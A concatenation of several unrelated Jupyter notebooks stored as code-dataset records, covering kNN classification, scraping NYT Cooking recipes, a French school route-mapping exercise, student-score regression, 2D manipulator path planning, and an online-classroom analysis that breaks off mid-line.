id=\"sb-aEhyTgNzN\"\n# ## Dataset - Train and test data\n\n# + id=\"2EY22g9fgO0f\"\n# Test distance function\n# Here, 0 means Not Fall(-), 1 means Fall(+)\ndataset = [[1,2,3,2,1,3,0],\n [2,1,3,3,1,2,0],\n [1,1,2,3,2,2,0],\n [2,2,3,3,2,1,0],\n [6,5,7,5,6,7,1],\n [5,6,6,6,5,7,1],\n [5,6,7,5,7,6,1],\n [7,6,7,6,5,6,1]]\n\n# + [markdown] id=\"8spMRh7PgU-g\"\n# ## Predicting for new dataset\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"Mzlh4rYFgXuX\" outputId=\"182c189d-1496-44fb-891f-c14861d96f65\"\nprediction = predict_classification(dataset, [7,6,5,5,6,7], 3)\n# Display\n# Expected 1, Got 1.\nprint('Expected %d, Got %d.' % ([7,6,5,5,6,7,1][-1], prediction))\n","repo_name":"HarshineeRoopakula/Machine-Learning-Projects","sub_path":"KNN/Falling Prediction using kNN/KNN_from_scratch.ipynb","file_name":"KNN_from_scratch.ipynb","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"24032751251","text":"# +\nfrom bs4 import BeautifulSoup \nimport requests\nimport pandas as pd\nimport numpy as np\npd.set_option('display.max_colwidth', None)\nimport time\n\nfrom tqdm.notebook import tqdm\nimport extruct\nimport pickle\n# -\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15\"\n}\n\n# +\nsitemap_url = 'https://www.nytimes.com/sitemaps/new/cooking.xml.gz'\nresponse = requests.get(sitemap_url, headers=headers)\nsitemap_xml = response.text\nsitemap_soup = BeautifulSoup(sitemap_xml, features='xml')\n\ngz_urls = []\nloc_tags = sitemap_soup.find_all('loc')\n\nfor loc in loc_tags:\n gz_urls.append(loc.get_text()) \n\ndisplay(gz_urls)\nprint(len(gz_urls))\n# -\n\nwith open('../data/nytc_raw_urls.pkl', 'rb') as f:\n recipe_urls = pickle.load(f)\n\n# +\n# recipe_urls = []\n\n# for url in tqdm(gz_urls):\n# response = requests.get(url, headers=headers)\n# sitemap_soup = BeautifulSoup(response.text, features='xml')\n# loc_tags = sitemap_soup.find_all('loc')\n# for loc in loc_tags:\n# recipe_urls.append(loc.get_text()) \n\n# -\n\ndisplay(recipe_urls)\nlen(recipe_urls)\n\n# +\n# with open('../data/nytc_raw_urls.pkl', 'wb') as f:\n# pickle.dump(recipe_urls, f)\n# -\n\n# Quick and dirty prune?\n\n# +\nimport random\n\nrandom_url = random.choice(recipe_urls)\nprint(random_url)\n\n# +\nimport extruct\n\npage = requests.get(random_url, headers=headers)\nrecipe_soup = BeautifulSoup(page.text, 'html.parser')\n\nrecipe_data = extruct.extract(\n page.text,\n syntaxes=['json-ld'],\n uniform=True,\n )['json-ld'][0]\ndisplay(recipe_data)\n\n# +\nheadline = recipe_data['name'] # or 'name'\nnutrition = recipe_data['nutrition']\ncategory = recipe_data['recipeCategory']\ncuisine = recipe_data['recipeCuisine']\ningredient = recipe_data['recipeIngredient']\ninstruction = recipe_data['recipeInstructions'][0]['text']\n\nprint(headline)\nprint(nutrition)\nprint(category)\nprint(cuisine)\nprint(ingredient)\nprint(instruction)\n# -\n\n# Test out a few recipes first\n\n# +\nfrom nytc import NYTC\n\nrecipes = pd.Series(recipe_urls, name='url')\nfeatures = ['recipe_name', 'nutrition', 'category', 'cuisine', 'ingredient', 'instruction', 'raw_schema']\n# -\n\nfeature_df = pd.DataFrame(columns=features)\nfor i in tqdm(range(10)):\n url = recipes.iloc[i]\n try:\n recipe = NYTC(url)\n feature_df.loc[i] = [getattr(recipe, feature)() for feature in features]\n time.sleep(np.random.uniform(0.05, 1))\n except:\n feature_df.loc[i] = [np.nan] * len(features)\n\n\nfeature_df.head(3)\n\nfeature_df = pd.DataFrame(columns=features)\nfor i in tqdm(range(len(recipe_urls))):\n url = recipes.iloc[i]\n try:\n recipe = NYTC(url)\n feature_df.loc[i] = [getattr(recipe, feature)() for feature in features]\n time.sleep(np.random.uniform(0.05, 1))\n except:\n feature_df.loc[i] = [np.nan] * len(features)\n\ndata_df = pd.concat([recipes, feature_df], axis=1)\n\ndata_df.to_pickle('../data/nytc_data.pkl')\n\n# Sanity Check\n\ndata_df.sample(10)\n\n\n# Append cooking time and image url to filtered dataframe\n\nwith open('../data/nytc_data_filtered.pkl', 'rb') as f:\n recipe_data = pickle.load(f)\n\nrecipe_data.shape\n\ndisplay(recipe_data.head(3))\n\nfiltered_url = recipe_data['url'].to_list()\nfiltered_url\n\n# +\nimport random\n\nrandom_url = random.choice(filtered_url)\nprint(random_url)\n\npage = requests.get(random_url, headers=headers)\nrecipe_soup = BeautifulSoup(page.text, 'html.parser')\n\nrecipe_data = extruct.extract(\n page.text,\n syntaxes=['json-ld'],\n uniform=True,\n )['json-ld'][0]\ndisplay(recipe_data)\n","repo_name":"clintonlau/TOMT","sub_path":"scrape/nytc_scrape.ipynb","file_name":"nytc_scrape.ipynb","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"40393454831","text":"# # Calcul d'itinéraires\n\n#
\n#\n# ## Un programme:\n#\n# **En Python la bibliothèque pyroutelib3 permet de déterminer des itinéraires à partir de coordonnées 'GPS'**\n\n# +\nfrom pyroutelib3 import Router\nfrom geopy.geocoders import ArcGIS\n\ngeolocator = ArcGIS()\n\nlocation1 = geolocator.geocode(\"Vire\")\nlocation2 = geolocator.geocode(\"Kairon Plage\")\n\nlat1=location1.latitude\nlon1=location1.longitude\n\nlat2=location2.latitude\nlon2=location2.longitude\n\nprint(lat1,lon1)\nprint(lat2,lon2)\n\n# création de l'itinéraire\nrouter = Router(\"car\")\ndepart = router.findNode(lat1,lon1)\nprint(depart)\narrivee = router.findNode(lat2, lon2)\nprint(arrivee)\n\nstatus, route = router.doRoute(depart,arrivee)\nif status == 'success':\n routeLatLons = list(map(router.nodeLatLon, route))\n\n# on fait afficher le début de la liste obtenue, et sa longueur\nprint(routeLatLons[:10])\nprint(len(routeLatLons))\n# -\n\n#
\n#\n# ### Faisons afficher cet itinéraire sur une carte\n#\n# Comme il y a 906 marqueurs, on utilisera une boucle qui ne fera afficher qu'un marqueur sur 10\n\n# +\nimport folium\n\nc= folium.Map(location=[lat1, lon1],zoom_start=9)\nfor indice,coord in enumerate(routeLatLons):\n if indice%10==0:\n coord=list(coord)\n folium.Marker(coord).add_to(c)\n \n# voici une méthode pour sauvegarder la carte obtenue\nc.save('playa.html')\n# affichage de la carte\ndisplay(c)\n\n# -\n\n#
\n#\n# ### Un itinéraire en vélo...\n#\n# Observer le code et repérez la ligne où on peut modifier le moyen de transport par : cycle, foot, horse, tram ou train\n#\n# ## À faire :\n#\n# **Écrire un programme qui affiche un itinéraire entre deux localité de votre choix en vélo, à pied ou à cheval..**\n#\n\n# +\n# Écrire le code ici\n# -\n\n#
\n#\n# ## Calculer la distance entre deux lieux\n#\n# Si on additionne des distances géodésiques (Voir TP 2) de lieux proches, on approxime assez bien la distance réelle\n#\n# Dans le code précédent routeLatLons est une liste de coordonnées de points proches les uns des autres\n#\n# **Voici un code qui permet d'additionner les distances géodésiques de ces lieux en miles**\n\n# +\nfrom geopy.distance import geodesic\n\n# calcul de la distance\nd=0\nfor i in range(0,len(routeLatLons)-1,1):\n d=d+geodesic(routeLatLons[i],routeLatLons[i+1]).km\nprint(d, \" km\")\n# -\n\n#
\n#\n# ## À faire :\n#\n# **Faites calculer la distance en km entre deux lieux de votre choix pour une ballade à pied ...**\n\n# +\n# Écrire le code ici\n# -\n\n#\n#
\n#\n#\n# ### Pour enregistrer:\n#\n# 1. File\n# 2. Download as \n# 3. Notebook (.ipynb)\n#\n# ### Autre méthode \n#\n# Cliquer dans la barre d'outils sur Download puis enregistrer le fichier.\n#\n#

Notebook à rendre sur pronote

\n#\n#\n\n\n","repo_name":"LyceeCurieVire/SNT","sub_path":"Charpentier/Itineraire.ipynb","file_name":"Itineraire.ipynb","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"7599621792","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + [markdown] id=\"vjmmTHWylovv\"\n# # **Graduate Rotational Internship Program**\n# # ** The Spark Foundation **\n\n# + [markdown] id=\"PjLlXysNm18R\"\n# # **Author: Ranjith Macharla**\n\n# + [markdown] id=\"TIl0xoHaBC_4\"\n# # **TASK1 :- Prediction Using Supervised Machine Learning**\n#\n\n# + [markdown] id=\"j3PKzeJSnFBG\"\n# # **Objective: To predict the score, that student will secure if a student studies for 9.25hrs/day**\n\n# + [markdown] id=\"5_1THnIUG-Bi\"\n# # **Dataset Loading and understanding the data**\n\n# + id=\"4fk8hPBeCVHr\"\nimport pandas as pd\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 204} id=\"pu3sKaevCxjA\" outputId=\"48fa1647-d58d-485b-a40c-f21b68e56541\"\ndataset=pd.read_csv(\"/content/student_scores - student_scores.csv\")\ndataset.head(5)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"XfpkPfanFg50\" outputId=\"fff482c0-5542-4710-924f-2c95248fe0a1\"\n\ndataset.shape\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"D7IYtxR-GdEj\" outputId=\"6235914e-2db6-44d2-8493-fc6a9a50d25b\"\ndataset.describe\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"YPn1LFb0Gr8w\" outputId=\"37f6a503-b1f7-4046-8ef3-996ee6cd341a\"\ndataset.info()\n\n# + [markdown] id=\"6_h0_BLZHpfH\"\n# # **Data Visualization**\n\n# + id=\"V4XNxcu_G6yK\"\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n# %matplotlib inline \n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 317} id=\"V9t4OxrtIjlg\" outputId=\"eefb0243-155b-4e5e-8059-ef9b2c034d95\"\nsns.scatterplot(x='Hours',y='Scores',data=dataset,color='blue')\nplt.title('Number of hours students study Vs Marks obtained ',fontsize=20,color='red')\nplt.xlabel('Number of hours students study',fontsize=10)\nplt.ylabel('Marks obtained',fontsize=10)\nplt.legend(['Marks'])\nplt.show\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 326} id=\"okL63-VALdyC\" outputId=\"e58533a0-d613-499d-9620-0743356cbc7c\"\nplt.bar(dataset[\"Hours\"].values, dataset[\"Scores\"].values, color='green')\nplt.title('number of hours student study Vs marks secured',fontsize=25)\nplt.xlabel('number of hours student study', fontsize=15)\nplt.ylabel('marks secured',fontsize=15)\nplt.show\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"iRBsN8goYul4\" outputId=\"42617dc3-816b-4b0a-fde1-7986862c0b64\"\nx=dataset.iloc[:,:-1].values\ny=dataset.iloc[:,1:].values\nprint(\"Hours\",x)\nprint(\"Scores\",y)\n\n# + [markdown] id=\"pjX6CYospQe0\"\n# # **Splitting dataset into training and testing dataset**\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"XFim2PC5Y2u7\" outputId=\"f87c7fc2-4b6e-4d05-d362-1653bb71478e\"\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)\nprint(x_train.shape)\nprint(y_train.shape)\nprint(x_test.shape)\nprint(y_test.shape)\n\n\n\n# + [markdown] id=\"otDasNHrplDG\"\n# # **Training the model using LinearRegression Algorithm**\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 204} id=\"IgQiYhYPbebK\" outputId=\"fc1d625b-4ddd-4269-ac9c-d1dc2978afde\"\nfrom sklearn.linear_model import LinearRegression \nlr=LinearRegression()\nlr.fit(x_train,y_train) \ny_pred=lr.predict(x_test)\n#print(y_pred)\n#print(y_test)\ny_test=list(y_test)\ny_pred=list(y_pred)\ndf = pd.DataFrame({'Actual':y_test,'Prediction':y_pred},index=[1,2,3,4,5])\ndf\n\n\n# + [markdown] id=\"DXCAMMvbp4Br\"\n#\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 312} id=\"pHNv_mv17Tf5\" outputId=\"2aaa279c-651c-43c4-d321-c7975324b883\"\nplt.scatter(x_train,y_train,color='green')\nplt.plot(x_train,lr.predict(x_train),color='red')\nplt.title(\"TrainingCase Vs Predictions\")\nplt.xlabel(\"student study hours\")\nplt.ylabel(\"marks secured\")\nplt.show\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 312} id=\"SbbKo36l4lZ7\" outputId=\"f22dd149-10e4-4132-c0f3-7d4d5b3d061a\"\nplt.scatter(x_test,y_test,color='green')\nplt.plot(x_test,y_pred,color='red')\nplt.title(\"TestCase Vs Predictions\")\nplt.xlabel(\"students study hours\")\nplt.ylabel(\"marks secured\")\nplt.show\n\n# + [markdown] id=\"fn-f-GOIqDPG\"\n# # **Model Evaluation**\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"EvMradPD8Bwm\" outputId=\"7c8ff6cd-3b58-474e-ec18-68d9bc0a0b28\"\nfrom sklearn import metrics\nfrom sklearn.metrics import accuracy_score\nm_a_e=metrics.mean_absolute_error(y_test,y_pred)\nprint(\"mean_absolute_error:{}\".format(m_a_e))\n\n\n# + [markdown] id=\"xAtaMTY6qJMc\"\n# # **Predicting the marks secured, if a student studies for 9.25 hrs/day**\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"NVCQtMMuBIrX\" outputId=\"71e25fd9-23a0-4415-fada-93e9b59a28a5\"\nHours=[[9.25]]\nprint(lr.predict(Hours))\n","repo_name":"ranjith-cpu/datascienceinternship-GRIP","sub_path":"linearregression.ipynb","file_name":"linearregression.ipynb","file_ext":"py","file_size_in_byte":4857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"20793173492","text":"# +\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport itertools\nimport time\nfrom functools import lru_cache\nimport heapq\nfrom matplotlib.widgets import Slider\nfrom ipywidgets import interact\n# %matplotlib inline\n\nPI = np.pi\nTWO_PI = 2 * np.pi\n\n# +\nnum_joints = 3\ndeltas = np.array([1/10] * num_joints)\n\nsolo_positive_moves = [[0] * (num_joints - i) + [1] * i for i in range(1, num_joints + 1)]\nsolo_negative_moves = [[0] * (num_joints - i) + [-1] * i for i in range(1, num_joints + 1)]\nmoves = np.array(solo_positive_moves + solo_negative_moves)\nmove_costs = np.stack([deltas, deltas], axis = 0).flatten()\nmoves, move_costs\n\n# +\n# num_joints= 3\n# deltas = np.arange(num_joints)\n# np.cumsum(deltas * np.concatenate([np.eye(num_joints), -np.eye(num_joints)], 0), 1)\n\n# +\nnum_joints = 4\nlengths = np.array([7, 6, 5, 3])\n\n\n# angles = np.array([0.5, 0.5, 0.5, 0.5]) * PI_CONSTANT\nangles = np.array([2 / 3, 1 / 3, -1/3, 0]) * PI\n# angles = np.array([2.93215314, 3.29867229, 1.46607657, 3.19395253])\n# angles = (PI_CONSTANT - np.array([1.98967535, 2.77507351, 3.56047167, -PI_CONSTANT])) % DOUBLE_PI_CONSTANT\n\ndelta_numbers = np.array([120] * num_joints)\nangles_constraints = [(1 - 10 / 180) * np.pi] * 4\n# -\n\nsup = Manipulator_2d_supervisor(num_joints, lengths, delta_numbers, angles_constraints)\ntest_random_state = sup.generate_random_state()\ntest_mann = Manipulator_2d(num_joints, lengths, np.array([2.04203522, 1.04719754, 0.05235989, 0.41887902]), delta_numbers)\ntest_mann.visualize()\nprint(sup.calculate_distance_between_states(test_random_state, np.array([0.5, 0.5, 0.5, 0.5]) * PI_CONSTANT))\n\n# +\npoints = np.array([[1, 2, 3],\n[1, 2 + 0.2, 3]])\n# print(points.shape)\ndef some_strange_function(A,B,C):\n left = (C[1] - A[1]) * (B[0] - A[0])\n right = (B[1] - A[1]) * (C[0] - A[0])\n len_cb = np.linalg.norm(C - B) ** 2\n if right == 0 or abs(left - right)/ right < 0.2: return 0\n if left > right: return 1\n return -1\n\nt1 = plt.Polygon(points.T, color='red')\nplt.gca().add_patch(t1)\nplt.scatter(points[0, :], points[1, :])\nplt.show()\nprint(some_strange_function(points[:, 0], points[:, 1], points[:, 2]))\n\n\n# +\ndef adjacent_joints_angles(angles):\n '''\n Returns True if angles are correct, else False\n '''\n if abs((PI + angles[0]) % TWO_PI) < angles_constraints[1]:\n return False\n for angle_index in range(num_joints - 1):\n if abs((PI + angles[angle_index] - angles[angle_index + 1]) % TWO_PI) < angles_constraints[angle_index + 1]:\n return False\n return True\n\ndef my_adj(angles):\n values = np.diff(angles, prepend=0)\n return not (np.abs((PI - values) % TWO_PI) < angles_constraints).any()\n\ndef calculate_dots(angles):\n dots = np.zeros((num_joints + 1, 2))\n dots[1:, 1] = np.cumsum(np.sin(angles))\n dots[1:, 0] = np.cumsum(np.cos(angles))\n return dots\n\nnum_joints= 4\nangles = np.array([1/4, -1/3, 1/6, 1/6]) * np.pi\nangles_constraints = np.array([(1 - 1/3) * np.pi] * 4)\ndots = calculate_dots(angles)\nplt.plot(dots[:,0], dots[:, 1])\nplt.show()\nprint(adjacent_joints_angles(angles), my_adj(angles))\n\n\n# -\n\nclass Manipulator_2d_supervisor():\n def __init__(self, \n num_joints: int, \n lengths: np.ndarray, \n angle_discretization: int, \n angles_constraints: np.ndarray,\n ground_level: int = 0,\n distanse_between_edges: int = 0.2):\n '''\n initializing Manipulator supervisor\n \n num_joint: number of manipulator joints\n length: np.ndarray of manipulator's arms length\n angle_discretization: int value of how many bins of angles we will have. Number of bins is TWO_PI / angle_discretization\n angles_constraints: np.ndarray with shape num_joints with left and right_bounds. \\\n Absolute value of differrence between to near angles couln't be more than PI(1 - angles_constraints)\n ground_level: float minimum level of joints positions.\n distanse_between_edges: float minimum distance between edges\n '''\n self.num_joints = num_joints\n self.lengths = lengths\n self.radius = sum(self.lengths)\n self.angle_discretization = angle_discretization\n self.deltas = TWO_PI / angle_discretization\n self.angles_constraints = angles_constraints\n self.possible_moves = np.cumsum(self.deltas * np.concatenate([np.eye(num_joints), -np.eye(num_joints)], 0), 1)\n self.ground_level = ground_level\n self.distanse_between_edges = distanse_between_edges\n \n @lru_cache(maxsize=10**4) \n def calculate_dots(self, angles):\n '''\n By angles of joints calculates coordinates of each joint.\n \n angles: angles of joints\n return: dots - np.ndarray(num_joints, 2) with coordinates x,y of each joint\n '''\n dots = np.zeros((self.num_joints + 1, 2))\n sin = np.sin(angles) * self.lengths\n cos = np.cos(angles) * self.lengths\n dots[1:, 1] = np.cumsum(sin)\n dots[1:, 0] = np.cumsum(cos)\n return dots\n \n @lru_cache(maxsize=10**4) \n def calculate_end(self, angles):\n '''\n By angles of joints calculates coordinates of last point of manipulator.\n \n angles: angles of joints\n return: (x, y) coordinates x,y of last point\n '''\n x = np.sum(np.sin(angles) * self.lengths)\n y = np.sum(np.cos(angles) * self.lengths)\n return (x, y)\n \n def calculate_distance_between_states(self, angles_1, angles_2):\n '''\n Calculates distanst between states like a difference between angles\n distanse = sum(\n min(\n abs(angles_1[i] - angles_1[i]),\n TWO_PI - abs(angles_1[i] - angles_1[i])\n )\n )\n '''\n diffs = (np.abs(angles_1 - angles_2)) % TWO_PI\n angle_diffs = np.minimum(diffs, (TWO_PI - diffs))\n return angle_diffs.sum()\n \n def generate_random_state(self):\n random_delta_numbers = np.random.randint(0, self.angle_discretization, self.num_joints)\n random_state = random_delta_numbers * self.deltas\n while not self.position_correctness(random_state):\n random_delta_numbers = np.random.randint(0, self.angle_discretization, self.num_joints)\n random_state = random_delta_numbers * self.deltas\n return random_state\n\n def orientation(self, A, B, C):\n '''\n A, B, C: points of triangle\n return orientation of triangle ABC as +1, -1\n if A is to close to BC segment return 0\n '''\n left = (C[1] - A[1]) * (B[0] - A[0])\n right = (B[1] - A[1]) * (C[0] - A[0])\n if right == 0 or abs(left - right) / right < self.distanse_between_edges:\n return 0\n if left > right: return 1\n return -1\n \n def do_intersect(self, segment1, segment2): \n '''\n Check intersection of two segments\n \n segment1: coordinates of start and finish poits of segment1\n segment2: coordinates of start and finish poits of segment2\n \n return True if has intersect and False otherwise\n '''\n A, B = segment1\n C, D = segment2\n o1 = orientation(A, C, D)\n o2 = orientation(B, C, D)\n o3 = orientation(A, B, C)\n o4 = orientation(A, B, D)\n return o1 * o2 * o3 * o4 == 0 or (o1 != o2 and o3 != o4) \n\n def position_intersection(self, dots):\n '''\n Returns True if NO self-intersection, else False\n '''\n for segment_1_index in range(self.num_joints - 1):\n for segment_2_index in range(segment_1_index + 2, self.num_joints):\n segment_1_dots = dots[segment_1_index: segment_1_index + 2] \n segment_2_dots = dots[segment_2_index: segment_2_index + 2]\n if self.do_intersect(segment_1_dots, segment_2_dots):\n return False\n return True\n\n def adjacent_joints_angles(self, angles):\n '''\n Returns True if angles are correct, else False\n '''\n diffs = np.diff(angles, prepend=0)\n return not (np.abs((PI - diffs) % TWO_PI) < self.angles_constraints).any()\n\n def position_correctness(self, angles):\n '''\n Checking if possition is correct \n input: angles of joints\n return: True if position is correct and False otherwise\n '''\n if not self.adjacent_joints_angles(angles):\n return False\n dots = self.calculate_dots(angles)\n return self.position_intersection(dots) and \\\n (dots[1:, 1] > self.ground_level).all()\n\n def get_successors(self, angles):\n '''\n Returns massive, which elements are [, ]\n '''\n possible_neighbours = (self.possible_moves + angles) % TWO_PI\n successors = []\n for successor_state in possible_neighbours:\n if self.position_correctness(successor_state):\n successors.append([successor_state, self.calculate_end(successor_state)])\n return successors\n\n def are_states_directly_connected(self, begin_state, end_state):\n connect_path = []\n current_state = begin_state\n while not self.calculate_distance_between_states(current_state, end_state) < 0.01:\n print(f' current = {current_state}')\n best_neighbour = None\n for successor_state, move_cost, x, y in self.get_successors(current_state):\n diffs = (np.abs(successor_state - end_state)) % TWO_PI\n angle_diffs = np.minimum(diffs, (TWO_PI - diffs))\n\n print(f'successor = {successor_state}, dist = {self.calculate_distance_between_states(successor_state, end_state)}, diff = {angle_diffs}')\n if self.calculate_distance_between_states(successor_state, end_state) < self.calculate_distance_between_states(current_state, end_state):\n neighbour = Manipulator_2d_node(successor_state, parent=current_state) \n best_neighbour = neighbour\n connect_path.append(best_neighbour)\n current_state = successor_state \n diffs = (np.abs(successor_state - end_state)) % TWO_PI\n angle_diffs = np.minimum(diffs, (2 * TWO_PI - diffs))\n print(f'chosen = {best_neighbour.get_angles()}, dist = {self.calculate_distance_between_states(best_neighbour.get_angles(), end_state)}, diff = {angle_diffs}')\n if best_neighbour is None:\n return False, None\n return True, connect_path\n \n def visualize_state(self, angles):\n dots = self.calculate_dots(angles)\n plt.figure(figsize=(10,6))\n plt.axis([-self.radius, self.radius, 0, self.radius])\n plt.plot(dots[:, 0], dots[:, 1])\n plt.scatter(dots[:, 0], dots[:, 1])\n\n\n","repo_name":"euskov17/Manipulators_Diploma","sub_path":"Manipulator2DMap/.ipynb_checkpoints/Manipulator_2D-checkpoint.ipynb","file_name":"Manipulator_2D-checkpoint.ipynb","file_ext":"py","file_size_in_byte":10999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"18873597609","text":"# + [markdown] id=\"nLQn0xwfWozn\"\n# # Predicting and analyzing student interraction and student success rate using Machine Learning algorithm.\n# -Anish Ghosh and Debopriyo Mukhopadhyay\n\n# + [markdown] id=\"XdlUGYKDXVEG\"\n# ##1.Predicting Student Interraction.\n\n# + [markdown] id=\"H9XuVsamYlEm\"\n# Required Header Files\n\n# + id=\"rfKpp0hoWlD6\"\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.preprocessing import StandardScaler\nimport matplotlib.pyplot as plt # plotting\nimport numpy as np # linear algebra\nimport os # accessing directory structure\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 73} id=\"F33DxA7BY40-\" outputId=\"faa641cd-6aeb-44ae-f792-fbe49ca74354\"\nfrom google.colab import files\n\n\nuploaded = files.upload()\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 488} id=\"osdrEURBZQF1\" outputId=\"42e358b3-7692-4538-cbe2-b07c68a4946f\"\ndf = pd.read_csv('online_classroom_data.csv', index_col=0)\ndf\n\n\n# + id=\"VxhxY9trdOjM\"\ndef plotPerColumnDistribution(df, nGraphShown, nGraphPerRow):\n nunique = df.nunique()\n df = df[[col for col in df if nunique[col] > 1 and nunique[col] < 50]] # For displaying purposes, pick columns that have between 1 and 50 unique values\n nRow, nCol = df.shape\n columnNames = list(df)\n nGraphRow = (nCol + nGraphPerRow - 1) / nGraphPerRow\n plt.figure(num = None, figsize = (6 * nGraphPerRow, 8 * nGraphRow), dpi = 80, facecolor = 'w', edgecolor = 'k')\n for i in range(min(nCol, nGraphShown)):\n plt.subplot(nGraphRow, nGraphPerRow, i + 1)\n columnDf = df.iloc[:, i]\n if (not np.issubdtype(type(columnDf.iloc[0]), np.number)):\n valueCounts = columnDf.value_counts()\n valueCounts.plot.bar()\n else:\n columnDf.hist()\n plt.ylabel('counts')\n plt.xticks(rotation = 90)\n plt.title(f'{columnNames[i]} (column {i})')\n plt.tight_layout(pad = 1.0, w_pad = 1.0, h_pad = 1.0)\n plt.show()\n\n\n# + id=\"qn08gMh6dw5z\"\n# Correlation matrix\ndef plotCorrelationMatrix(df, graphWidth):\n filename = df.dataframeName\n df = df.dropna('columns') # drop columns with NaN\n df = df[[col for col in df if df[col].nunique() > 1]] # keep columns where there are more than 1 unique values\n if df.shape[1] < 2:\n print(f'No correlation plots shown: The number of non-NaN or constant columns ({df.shape[1]}) is less than 2')\n return\n corr = df.corr()\n plt.figure(num=None, figsize=(graphWidth, graphWidth), dpi=80, facecolor='w', edgecolor='k')\n corrMat = plt.matshow(corr, fignum = 1)\n plt.xticks(range(len(corr.columns)), corr.columns, rotation=90)\n plt.yticks(range(len(corr.columns)), corr.columns)\n plt.gca().xaxis.tick_bottom()\n plt.colorbar(corrMat)\n plt.title(f'Correlation Matrix for {filename}', fontsize=15)\n plt.show()\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"l6NIC3A-ZeaN\" outputId=\"84cebcae-9d71-4b12-e252-1ea486a12066\"\nnRowsRead = 1000 # specify 'None' if want to read whole file\ndf1 = pd.read_csv('online_classroom_data.csv', delimiter=',', nrows = nRowsRead)\ndf1.dataframeName = 'online_classroom_data.csv'\nnRow, nCol = df1.shape\nprint(f'There are {nRow} rows and {nCol} columns')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 288} id=\"RqVXcxDSiUdY\" outputId=\"806e176b-2445-4cbd-b847-df9792c30b05\"\ndf1.head(5)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 621} id=\"awdI6unsignA\" outputId=\"d71dbce6-7878-42b7-e1dd-df80c13096df\"\nplotPerColumnDistribution(df1, 10, 5)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 647} id=\"tT2-TjKHirc4\" outputId=\"7a7b31a1-20cb-4b79-9f1e-064f91146c39\"\nplotCorrelationMatrix(df1, 8)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 961} id=\"FeEq8dmDi9WQ\" outputId=\"b486dc4f-8ba7-45fc-ead8-10377d294757\"\nimport seaborn as sns \nsns.pairplot(df1)\n\n# + [markdown] id=\"y6kR1LXJa0L0\"\n# ##2.Analyzing Success Rate of student.\n#\n\n# + [markdown] id=\"qD3xvXWRj6Bf\"\n# Require Header Files.\n\n# + id=\"szW5veGsZxEd\"\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# + [markdown] id=\"E5GItDlnkR-H\"\n# Data Loading\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 270} id=\"XpJZ3JtskRX_\" outputId=\"0d075c20-2160-4c2e-e4d9-d580202cbc58\"\ndf_data_1 = pd.read_csv('online_classroom_data.csv', index_col=0)\ndf_data_1.replace(',', '.', regex=True, inplace=True)\ndf_data_1.head()\n\n# + [markdown] id=\"Wv4cDFjylULe\"\n# Feature Scaling and target\n\n# + id=\"Z-4AKWG1lQ22\"\nfrom sklearn import preprocessing\n\ny = df_data_1['Approved'].values\n\nX = df_data_1[['total_posts', 'helpful_post', 'nice_code_post', 'collaborative_post', 'confused_post','creative_post','bad_post','amazing_post','timeonline']].values\nX = preprocessing.StandardScaler().fit(X).transform(X)\n\n# + [markdown] id=\"VL0ABRpclomO\"\n# Simple Train/test split\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"coZKvEwAlboO\" outputId=\"a7789779-6c54-4b0b-b8b6-3c233b399d9c\"\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import log_loss\n\nX_train, X_test, y_train, y_test = train_test_split( X, y, test_size=0.2, random_state=4)\n\nprint ('Train set:', X_train.shape, y_train.shape)\nprint ('Test set:', X_test.shape, y_test.shape)\n\n\n# + [markdown] id=\"XiytAPnDmCmv\"\n# Model Fitting\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"1eR_X0IOl7MW\" outputId=\"5e69641a-abc5-4701-dac0-3c3b2035d10f\"\nimport xgboost as xgb\n\nxgb_model = 